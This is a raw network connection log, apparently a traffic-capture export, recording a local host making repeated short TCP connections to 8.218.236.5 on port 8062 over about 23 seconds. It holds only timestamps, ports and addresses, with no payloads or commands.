Apr 19, 2024 09:51:06.769150972 CEST	8062	49820	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:06.769182920 CEST	8062	49820	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:06.769392014 CEST	49820	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:06.769392967 CEST	49820	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:06.769392967 CEST	49820	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:06.876867056 CEST	49821	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:07.088294983 CEST	8062	49820	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:07.203202009 CEST	8062	49821	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:07.203403950 CEST	49821	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:07.203593969 CEST	49821	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:07.529644966 CEST	8062	49821	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:07.531819105 CEST	8062	49821	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:07.531883955 CEST	8062	49821	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:07.531949997 CEST	49821	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:07.531949997 CEST	49821	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:07.532037020 CEST	49821	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:07.641988993 CEST	49822	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:07.858666897 CEST	8062	49821	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:07.974494934 CEST	8062	49822	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:07.974679947 CEST	49822	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:07.974930048 CEST	49822	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:08.307128906 CEST	8062	49822	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:08.309839010 CEST	8062	49822	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:08.309883118 CEST	8062	49822	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:08.309919119 CEST	49822	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:08.309998035 CEST	49822	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:08.310067892 CEST	49822	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:08.423198938 CEST	49823	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:08.642398119 CEST	8062	49822	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:08.741767883 CEST	8062	49823	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:08.741919041 CEST	49823	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:08.742126942 CEST	49823	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:09.060424089 CEST	8062	49823	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:09.062599897 CEST	8062	49823	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:09.062700987 CEST	8062	49823	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:09.062742949 CEST	49823	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:09.062794924 CEST	49823	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:09.062880039 CEST	49823	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:09.173243046 CEST	49824	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:09.385833979 CEST	8062	49823	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:09.497179031 CEST	8062	49824	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:09.497292042 CEST	49824	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:09.497498989 CEST	49824	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:09.821413994 CEST	8062	49824	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:09.823120117 CEST	8062	49824	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:09.823179007 CEST	8062	49824	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:09.823302984 CEST	49824	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:09.823302984 CEST	49824	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:09.823406935 CEST	49824	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:09.939161062 CEST	49825	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:10.147481918 CEST	8062	49824	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:10.262341976 CEST	8062	49825	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:10.262482882 CEST	49825	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:10.262671947 CEST	49825	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:10.585742950 CEST	8062	49825	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:10.588037968 CEST	8062	49825	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:10.588124990 CEST	8062	49825	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:10.588143110 CEST	49825	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:10.588215113 CEST	49825	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:10.588288069 CEST	49825	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:10.705113888 CEST	49826	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:10.911473989 CEST	8062	49825	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:11.017414093 CEST	8062	49826	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:11.017529964 CEST	49826	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:11.017699957 CEST	49826	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:11.329818010 CEST	8062	49826	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:11.331636906 CEST	8062	49826	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:11.331697941 CEST	8062	49826	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:11.331867933 CEST	49826	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:11.331867933 CEST	49826	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:11.331867933 CEST	49826	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:11.439618111 CEST	49827	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:11.644159079 CEST	8062	49826	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:11.777607918 CEST	8062	49827	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:11.777929068 CEST	49827	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:11.778014898 CEST	49827	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:12.115577936 CEST	8062	49827	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:12.117337942 CEST	8062	49827	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:12.117377996 CEST	8062	49827	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:12.117434978 CEST	49827	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:12.117539883 CEST	49827	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:12.117619991 CEST	49827	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:12.236587048 CEST	49828	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:12.454936981 CEST	8062	49827	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:12.561744928 CEST	8062	49828	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:12.561877012 CEST	49828	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:12.562295914 CEST	49828	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:12.887264013 CEST	8062	49828	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:12.889106035 CEST	8062	49828	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:12.889127970 CEST	8062	49828	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:12.889183044 CEST	49828	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:12.889230967 CEST	49828	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:12.889364004 CEST	49828	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:13.001905918 CEST	49829	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:13.214123964 CEST	8062	49828	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:13.319992065 CEST	8062	49829	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:13.320184946 CEST	49829	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:13.320489883 CEST	49829	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:13.638545990 CEST	8062	49829	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:13.640295029 CEST	8062	49829	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:13.640336037 CEST	8062	49829	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:13.640358925 CEST	49829	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:13.640417099 CEST	49829	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:13.641206026 CEST	49829	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:13.751907110 CEST	49830	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:13.959319115 CEST	8062	49829	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:14.070002079 CEST	8062	49830	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:14.070132971 CEST	49830	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:14.070343971 CEST	49830	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:14.388226986 CEST	8062	49830	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:14.390037060 CEST	8062	49830	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:14.390099049 CEST	8062	49830	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:14.390156031 CEST	49830	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:14.390156031 CEST	49830	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:14.390269041 CEST	49830	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:14.501375914 CEST	49831	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:14.708434105 CEST	8062	49830	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:14.840382099 CEST	8062	49831	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:14.840580940 CEST	49831	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:14.840965033 CEST	49831	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:15.179732084 CEST	8062	49831	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:15.181468010 CEST	8062	49831	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:15.181509018 CEST	8062	49831	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:15.181700945 CEST	49831	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:15.181700945 CEST	49831	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:15.181967974 CEST	49831	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:15.298948050 CEST	49832	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:15.520859003 CEST	8062	49831	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:15.617060900 CEST	8062	49832	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:15.617444038 CEST	49832	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:15.617444992 CEST	49832	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:15.935364008 CEST	8062	49832	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:15.937375069 CEST	8062	49832	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:15.937448978 CEST	8062	49832	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:15.937473059 CEST	49832	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:15.937566996 CEST	49832	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:15.937659979 CEST	49832	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:16.050203085 CEST	49833	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:16.255281925 CEST	8062	49832	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:16.373378992 CEST	8062	49833	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:16.373616934 CEST	49833	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:16.373707056 CEST	49833	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:16.696739912 CEST	8062	49833	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:16.699316025 CEST	8062	49833	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:16.699345112 CEST	8062	49833	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:16.699546099 CEST	49833	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:16.701077938 CEST	49833	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:16.814346075 CEST	49834	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:17.023936987 CEST	8062	49833	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:17.137696981 CEST	8062	49834	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:17.138513088 CEST	49834	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:17.138624907 CEST	49834	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:17.461869955 CEST	8062	49834	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:17.463918924 CEST	8062	49834	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:17.463984966 CEST	8062	49834	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:17.464181900 CEST	49834	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:17.464181900 CEST	49834	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:17.464181900 CEST	49834	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:17.579543114 CEST	49835	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:17.787333012 CEST	8062	49834	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:17.896061897 CEST	8062	49835	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:17.896275997 CEST	49835	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:17.896373034 CEST	49835	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:18.212435961 CEST	8062	49835	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:18.214231014 CEST	8062	49835	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:18.214333057 CEST	8062	49835	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:18.214365005 CEST	49835	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:18.214452982 CEST	49835	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:18.214452982 CEST	49835	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:18.330444098 CEST	49836	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:18.530397892 CEST	8062	49835	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:18.651904106 CEST	8062	49836	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:18.652173042 CEST	49836	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:18.652326107 CEST	49836	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:18.972862959 CEST	8062	49836	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:18.975106955 CEST	8062	49836	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:18.975171089 CEST	8062	49836	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:18.975244045 CEST	49836	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:18.975343943 CEST	49836	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:18.975454092 CEST	49836	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:19.083024025 CEST	49837	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:19.295846939 CEST	8062	49836	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:19.406923056 CEST	8062	49837	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:19.407094002 CEST	49837	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:19.407246113 CEST	49837	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:19.731034994 CEST	8062	49837	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:19.735529900 CEST	8062	49837	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:19.735563040 CEST	8062	49837	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:19.735631943 CEST	49837	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:19.735743046 CEST	49837	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:19.845993042 CEST	49838	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:20.059518099 CEST	8062	49837	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:20.178159952 CEST	8062	49838	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:20.178263903 CEST	49838	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:20.178515911 CEST	49838	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:20.510504961 CEST	8062	49838	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:20.512835026 CEST	8062	49838	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:20.512897968 CEST	8062	49838	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:20.512927055 CEST	49838	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:20.512958050 CEST	49838	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:20.513060093 CEST	49838	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:20.626671076 CEST	49839	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:20.844739914 CEST	8062	49838	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:20.947043896 CEST	8062	49839	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:20.947141886 CEST	49839	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:20.947350979 CEST	49839	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:21.267278910 CEST	8062	49839	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:21.269366980 CEST	8062	49839	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:21.269434929 CEST	8062	49839	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:21.269439936 CEST	49839	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:21.269480944 CEST	49839	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:21.269596100 CEST	49839	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:21.377091885 CEST	49840	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:21.589535952 CEST	8062	49839	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:21.689543009 CEST	8062	49840	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:21.689640045 CEST	49840	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:21.689830065 CEST	49840	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:22.001895905 CEST	8062	49840	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:22.004308939 CEST	8062	49840	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:22.004374027 CEST	8062	49840	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:22.004374027 CEST	49840	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:22.004420042 CEST	49840	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:22.004544020 CEST	49840	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:22.110877037 CEST	49841	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:22.316579103 CEST	8062	49840	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:22.432421923 CEST	8062	49841	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:22.435349941 CEST	49841	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:22.435525894 CEST	49841	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:22.756308079 CEST	8062	49841	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:22.758346081 CEST	8062	49841	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:22.758415937 CEST	8062	49841	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:22.758424044 CEST	49841	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:22.758470058 CEST	49841	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:22.758683920 CEST	49841	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:22.876471043 CEST	49842	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:23.079509020 CEST	8062	49841	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:23.202933073 CEST	8062	49842	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:23.205394983 CEST	49842	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:23.205575943 CEST	49842	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:23.532422066 CEST	8062	49842	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:23.534665108 CEST	8062	49842	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:23.534730911 CEST	8062	49842	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:23.534778118 CEST	49842	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:23.534887075 CEST	49842	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:23.534887075 CEST	49842	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:23.643203020 CEST	49843	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:23.861320972 CEST	8062	49842	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:23.981271982 CEST	8062	49843	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:23.982371092 CEST	49843	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:23.995028973 CEST	49843	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:24.333046913 CEST	8062	49843	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:24.334868908 CEST	8062	49843	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:24.334932089 CEST	8062	49843	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:24.335045099 CEST	49843	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:24.335138083 CEST	49843	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:24.439155102 CEST	49844	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:24.673053980 CEST	8062	49843	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:24.781074047 CEST	8062	49844	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:24.781167984 CEST	49844	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:24.781358004 CEST	49844	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:25.119926929 CEST	8062	49844	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:25.121988058 CEST	8062	49844	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:25.122049093 CEST	8062	49844	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:25.122076988 CEST	49844	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:25.122194052 CEST	49844	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:25.122194052 CEST	49844	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:25.236160994 CEST	49845	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:25.459566116 CEST	8062	49844	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:25.556468964 CEST	8062	49845	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:25.556723118 CEST	49845	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:25.557066917 CEST	49845	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:25.876887083 CEST	8062	49845	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:25.878838062 CEST	8062	49845	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:25.878956079 CEST	8062	49845	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:25.878983974 CEST	49845	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:25.879024982 CEST	49845	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:25.879209995 CEST	49845	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:25.986107111 CEST	49846	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:26.199346066 CEST	8062	49845	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:26.305159092 CEST	8062	49846	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:26.305483103 CEST	49846	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:26.305483103 CEST	49846	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:26.624325037 CEST	8062	49846	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:26.626176119 CEST	8062	49846	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:26.626218081 CEST	8062	49846	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:26.626269102 CEST	49846	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:26.626349926 CEST	49846	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:26.626377106 CEST	49846	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:26.736018896 CEST	49847	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:26.944902897 CEST	8062	49846	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:27.073103905 CEST	8062	49847	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:27.073194027 CEST	49847	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:27.073419094 CEST	49847	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:27.410162926 CEST	8062	49847	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:27.412439108 CEST	8062	49847	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:27.412502050 CEST	8062	49847	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:27.412517071 CEST	49847	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:27.412553072 CEST	49847	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:27.412648916 CEST	49847	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:27.517390966 CEST	49848	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:27.749053955 CEST	8062	49847	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:27.834881067 CEST	8062	49848	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:27.834971905 CEST	49848	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:27.835165024 CEST	49848	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:28.152757883 CEST	8062	49848	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:28.154647112 CEST	8062	49848	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:28.154712915 CEST	8062	49848	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:28.154720068 CEST	49848	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:28.154808044 CEST	49848	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:28.154876947 CEST	49848	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:28.267627954 CEST	49849	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:28.472493887 CEST	8062	49848	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:28.586988926 CEST	8062	49849	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:28.587091923 CEST	49849	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:28.587287903 CEST	49849	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:28.906493902 CEST	8062	49849	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:28.909405947 CEST	8062	49849	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:28.909472942 CEST	8062	49849	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:28.909475088 CEST	49849	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:28.909589052 CEST	49849	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:29.016927958 CEST	49849	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:29.017268896 CEST	49850	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:29.333487988 CEST	8062	49850	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:29.333690882 CEST	49850	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:29.333817005 CEST	49850	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:29.335958004 CEST	8062	49849	8.218.236.5	192.168.2.4
